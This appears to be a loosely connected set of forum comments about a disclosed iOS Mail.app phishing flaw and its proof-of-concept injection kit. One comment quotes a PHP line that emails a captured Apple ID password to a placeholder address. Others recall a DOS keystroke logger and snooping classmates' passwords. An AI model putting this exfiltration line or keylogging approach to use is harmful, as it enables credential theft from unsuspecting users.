If I were more paranoid about the security of my phone I probably wouldn't have used these inputs because they seem a lot like a phishing attack - but I risked it an assumed it's just a bug or lazy reviewer at Apple.
They should at the very least bounce you to Settings.app instead of showing the dialog inside whatever app you're using.
I didn't use the passwords for anything... But there was a guy in another class whose password was the name of the girl on whom I had a crush too. Illicit knowledge bred jealousy! Neither of us ever got the girl.
It sucks that they depreciated it. I wish it were still around, maybe we could have it disabled by default, and just use a GPO to enable it.
I did the very same thing ~20 years ago. I used a DOS Terminate and Stay Resident (TSR) code to achieve this, I did't have to fake any screen. The key strokes were stored in a file.
I still remember keyboard interrupt value (0x9) while registering TSR code.
I also liked the fact YouTube started to play "New iOS 8 Mail App: Here's Why It Is Impressive!" video automatically after that video.
It sounds like this guy may have skipped the threatening step and just went public.
"mail('email@example.com','Apple ID Password',"Thanks for your password! \n $data ¯\_(ツ)_/¯ \n https://github.com/jansoucek/iOS-Mail.app-inject-kit");"
When submitting, please follow the guidelines and use the original title unless it is misleading or linkbait.
First the SMS of doom that could crash any iOS or Mac device, now this. Seriously though, thanks for the fappening!